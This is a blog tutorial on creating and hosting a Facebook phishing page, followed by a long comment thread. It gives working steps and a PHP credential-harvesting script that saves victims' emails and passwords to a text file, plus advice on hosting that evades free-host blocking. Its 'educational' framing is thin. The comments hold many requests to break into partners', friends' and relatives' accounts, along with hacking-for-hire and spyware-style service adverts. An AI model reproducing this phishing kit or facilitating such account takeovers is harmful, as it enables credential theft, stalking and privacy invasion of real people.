Facebook-Phishing-Page

First of all, let me tell you one thing. This article is written only for educating people about how phishing works and how should they prevent phishing scams. Please don’t use these techniques for malicious purposes.

What is Phishing?

Phishing is a most popular technique used for hacking passwords and stealing sensitive information like credit cards, banking username & passwords etc. Phishing aka fishing attack is a process of creating a duplicate copy or a clone of a reputed website in the intention of stealing user’s password or other sensitive information like credit card details. It is easy for anyone who is having little technical knowledge to get a phishing page done and that is why this method is so popular.

Phishing scams prompts users to enter sensitive details at a fake webpage (phishing page) whose look and feel are very identical to legitmate webpages. In most cases, the only difference is URL. URL can also be spoofed in some cases if the legitmate website is vulnerable.

It is difficult for a commoner to identify the phishing scams page because of its trustworthy layout.

Also learn how to hack facebook account password account in few minutes. 

How phishing works?

Hackers / Attackers target general public and send them phishing links through email or personal message where the victim is prompted to click on a link in the email. The user / victim will get navigated to a Phishing page that pretends to be legit. Common people who don’t find that phishing page suspicious are induced to enter their sensitive information and all the information would get sent to the hacker / attacker.

Phishing Example 

Lets take Facebook as an example, Creating a page which perfectly looks like Facebook login page but putting it in a different URL like fakebook.com or faecbook.com or any URL which pretends to be legit. When a user lands on such page, he/she might think that is real Facebook login page and asking them to provide their username and password. So the people who don’t find the fake login page suspicious might enter their username, password and the password information would be sent to the hacker/attacker who created it, simultaneously the victim would get redirected to original Facebook page.

Real Life Example : John is a programmer, he creates a Facebook login page with some scripts to enable him to get the username and password information and put it in https://www.facebouk.com/make-money-online-tricks. Peter is a friend of John. John sends a message to Peter “Hey Peter, I found a way to make money online easily you should definitely take a look at this https://www.facebouk.com/make-money-online-tricks”. Peter navigate to the link and see a Facebook login page. As usual Peter enters his username and password of Facebook. Now the username and password of Peter is sent to John and Peter get redirected to a money making tips page https://www.facebouk.com/make-money-online-tricks-tips.html. That’s all Peter’s Facebook account is hacked.

Also read how to hack gmail account

How to create a Phishing page in minutes? 




We are going to take Facebook phishing page as an example.

  • Go to Facebook.com, make sure you are not logged in to Facebook.
  • Press Ctrl + U to view source code.
  • Copy the source code and paste it in a notepad.
  • Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing Ctrl + F in notepad. In Facebook login page, action attribute was filled with Facebook login process url, replace it with process.php
  • You have to find name of input fields using inspect element (Ctrl + Shft + I in Chrome), in our case it is email and pass
  • Save this file as index.html
  • Now you have to get username and password stored in a text file named phishing.txt
  • Create a file named process.php using the following code.

Process.php

<?
if(isset($_POST[’email’]) && isset($_POST[‘pass’]))
{
$password=file_get_contents(‘phishing.txt’);
$phishing = fopen(“phishing.txt”,”w”);
fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”);
fclose($file);
echo ‘<script>window.location.href=”https://wwww.facebook.com/”</script>’;
}
else
echo ‘<script>window.location.href=”index.html”</script>’;
?>

How to host phishing page in a URL?

To put phishing page in a URL, you need to have two things.

  1. Domain
  2. Web Hosting

Get a Free Domain

You can create a free domain at Bluehost if you pay for their hosting plans. Once you create a domain, you need to get hosting and setup name servers for it. If you select bluehost you don’t need to setup name servers since it will already be set.

Get Web Hosting

Almost all free hosting panels would block phishing pages. So you need to get any paid shared hosting package, it would cost around $4 USD per month. I prefer bluehost for their excellent service and performance. Get bluehost shared hosting and free domain now.

Once you setup domain and hosting, you can upload the files using FTP software. That’s all you can test it now.

How could you protect yourself from phishing scams?



Hackers can reach you in many ways like email, personal messages, Facebook messages, Website ads etc. Clicking any links from these messages would lead you to a login page. Whenever you find a email that navigates you to a webpage, you should note only one thing which is URL because nobody can spoof URL except when there is any XSS zero day vulnerability.

What is the URL you see in browser address bar? Is that really https://www.LEGITWEBSITE.com? Is there any Green colour secure symbol (HTTPS) provided in the address bar? You can prevent hacking by remembering these questions.  Also see the below examples of Facebook phishing pages.

Perfect Phishing Pages

Facebook Phishing Scams
Note the misleading URL

Most of the people won’t suspect this page (snapshot given above) since there is https prefix with green colour secure icon and no mistake in www.facebook.com. But this is a phishing page how? Note the URL correctly. It is https://www.facebook.com.infoknown.com so www.facebook.com is a subdomain of infoknown.com. Google Chrome don’t differentiate the sub-domain and domain unlike Firefox do. SSL Certificates (HTTPS) can be obtained from many vendors, few vendors give SSL Certificate for Free for 1 year. Its not a big deal for a novice to create a perfect phishing page like this. So be aware of it.

Facebook Phishing Scam page with email password
Facebook Phishing Page – Note the misleading URL.

This is a normal Facebook Phishing page with some modification in the word Facebook.

Phishing scams

Phishing scams are attempts by scammers / hackers / cybercriminals to trick you to enter your sensitive infomation like internet banking username & passwords, credit card details etc. As described above, phishing scams focuses on retrieving monetary details indirectly.

Phishing email

Most of the time phishing scams happens through email. Hackers spoof the email address of any legitmate website or authority to send phishing scam email, so the users are convinced to believe that the email is sent from a legit website. Email address can be easily spoofed using email headers. Server scripting languages like php helps a commoner to spoof from email address easily. Popuplar email services like gmail are smart enough to identify phishing email and route it to spam folder. But still there are some ways for a hacker to send phishing emails.

SHARE
  • i hope you help me for hacking

    • sandeep reddy

      you can follow my blogs: techflout.com or sandeepreddy.online

  • ali

    Lovely

  • prince raghav

    Hii laxman i have an problem. Plzz help me dear. Urgent work. U talk with me on whatsapp. My whatsaap no. is 7742806721

    • sadam khana

      What,s country code

      • Aashu Meena

        you can contact me. i can provide u link. or hack for u.
        feel free to contact
        7014776295.

      • Aksahy Uluwar

        gay spotted

        lol

  • jalal

    how should i hack a face book

  • joe

    Can one perform phishing using a phone?

  • pratesh

    Hai i have an other doubt plz contact me to my mail [email protected]
    Plz

  • cristy.dumpa

    how to make hacked facebook
    beacouse my facebook is hacked to my couzin

  • prince

    I have need some in thise work.. ples help me

  • prince

    need some video…..

  • sowpon
  • Dhammika Nishantha

    Hay

  • Aashu Meena

    anyone need help contact me. i hack fb id free. call or whatsaap me 7014776295

    • faheem khokhar

      your country code??

      • Aashu Meena

        +91

      • Aashu Meena

        +91

      • Akum

        798061

  • sadam khana

    Please some one help me to hack facebook hacking account matter of love this is my what,sapp number 0092301787883 country Pakistan I hope that someone help me

    • Aashu Meena

      YOu can contact us. We can help you. we can hack fb id of ur partner by phising,
      you can contact us.

      kuldeep
      07014776295

  • ibeabella

    Please help me how to hack the FB account of crab mentality people because they posted unnecessary things about me because of jealousy

    • Aashu Meena

      you can contact me. i can provide u link. or hack for u.
      feel free to contact
      7014776295

    • Aashu Meena

      contact me. i can help u

    • Aashu Meena

      anyone need help contact me. i hack fb id free. call or whatsaap me 7014776295..

    • Aashu Meena

      you can contact me. i can provide u link. or hack for u.
      feel free to contact
      +917014776295.(kuldeep)

  • Aashu Meena

    Thank admin to create phising page.
    any one can take my help. or i can provide u phising link, if u want to hack som1 fb id.
    7014776295

  • Akum

    Can u help me

  • Akum

    Yo

  • Hey guys. Regards to either hacking or spamming pls contact me on: [email protected]. I can help you in what ever issue you are in. I’m a Russian also skills in the hacking filed.

  • Aashu Meena

    anyone need help contact me. i hack fb id free. call or whatsaap me 7014776295…

  • Syeda Humaira

    Need help anybody there?😭

    • Aashu Meena

      you can contact me. i can provide u link. or hack for u.
      feel free to contact .
      +917014776295.(kuldeep)

  • Nikki Girl

    Help me hack plz.
    Email me at [email protected]

    • Aashu Meena

      you can contact me. i can provide u link. or hack for u.
      feel free to contact..
      +917014776295.(kuldeep)

  • Samuel Oluwasanmi

    hey
    how can i create a Facebook phishing page on mac os
    and what notepad app do you use

  • ♔ princewako

    i lost my Facebook account to a hacker who was my cousin. He refused to give me the password to my account even after i told him. it is now almost 4 years and i still can not access my account. i really need to hack in to it and close it. please help me.

  • riz

    can you please help me to hack / remove a facebook account that showing all about me. wasap +6285703593508

  • Marshall Brady

    I don’t know where to find the Action Attribute for facebook is and i’ve been searching for it. I found the word action, but i don’t know what to remove. A picture would be very helpful and if you can help me out @vb_preston (Thats my Instagram)

    • Alec Derose

      u ll find it in microsoft word……den changes made and saved again in notepad…broo

  • sneha goswami

    Can you please help me

  • Ogzy Beat

    i need someone to help me learn much about hacking ….you can whats app me on +233507486287 please if you are willing to help pls contact me

    • POLOLOCO

      what do you want hack bro?

      • Aaiza Yousuf

        Hi can you please help me, I want to hack someone’s facebook it is very very important

  • Aaiza Yousuf

    Hey, Can someone please help me , I want to hack someone’s facebook account it is very important. Please contact me I really need help

    • Anish Pandey

      Yes i can.. How will i contact you?

      • Sanober Razzaq

        i also want to hack someone facebook account.. do help me

      • Bianca Joyce Gyo

        Can you also help me? Please.

      • Jason Dwight Dickson

        Can you help me as well?

      • Ãåmįñā Māłįk

        I really need to hack my fiancée account can u help me plzzz it’s urgent

      • Eric Merrifield

        I really need to find a way on wife’s facebook she has been cheating

    • Bianca Joyce Gyo

      I also need help. This is urgent. Please also help me. I badly need help. Thank you. Please contact me.

  • Ramon Carlos Araneta

    Is trying to crash a party malicious? My friends have been hanging out without me andd I get extremely jealous. I just want to do phishing in order to view groupchats they have without me so I can see when they will have birthday parties and I can just but in.

  • Antony Wiranto

    can someone help me hack my friend’s account ..

  • Bianca Joyce Gyo

    I need help can someone help me? I need to hack someone’s account asap.

    • Bianca Joyce Gyo

      It is very urgent so I need somebody to help me. Thank you.

  • joe

    okay. i can only help two to hack. i am a certified hacker and its what i do. contact me with my email. [email protected]

  • Joe De Jesus

    Can someone help me hack a fb acc???

    Really important

  • Myint

    Please tell me how can i hacked my boyfriend facebook account he always change his password

  • Shiva Kumar

    Bro how to hack my fb frnd
    because his so irritating MY frnd….

  • Lady_Bug

    My boyfriend just started smoking meth and from what Inwas told, he contacted them through his facebook. Can someone help me hack his facebook? I want to see how all of this started.

  • Jack Seng

    I really need help with this 🙁

  • Miriam Hanna

    can someone help me creating this phishing page? I am having trouble at last 2-3 points

  • Basim Abdullah

    window.location.href=”https://wwww.facebook.com/”’;
    }
    else
    echo ‘’;
    ?>
    how to solve?

  • B Leo

    please i really need help, i have been making it wrong for months, please i need help

  • Wafa Naqvi

    dear i want to ask you how to make a phishing page

  • Wafa Naqvi

    after making a page how can we attack on the profile though this or can we attack on their desktop firewall??

  • ember kardashian

    If you know you not are ready for a relationship why get into one and still cheat and lie. I and my husband has been married for some years now,lately he has been hiding his phone from me and keeping late nights. I was curious about him cheating on me. I had no proof and no one to run to.I contacted a Private investigator who linked me up with Mr thomas ( nash89440 @ gmail.com) via email. He understood me well and helped me spy on my cheating husband. He gave me the password to my husband’s Gmail and Facebook account and linked all my spouse WhatsApp messages and phone conversation to me, to find out the truth. I just want to openly say thank you. Contact him today if you need help. [email protected] or text his viber number +1(929)2677640

  • Drazieth Gaming

    Can anyone help set up a phishing page for hotmail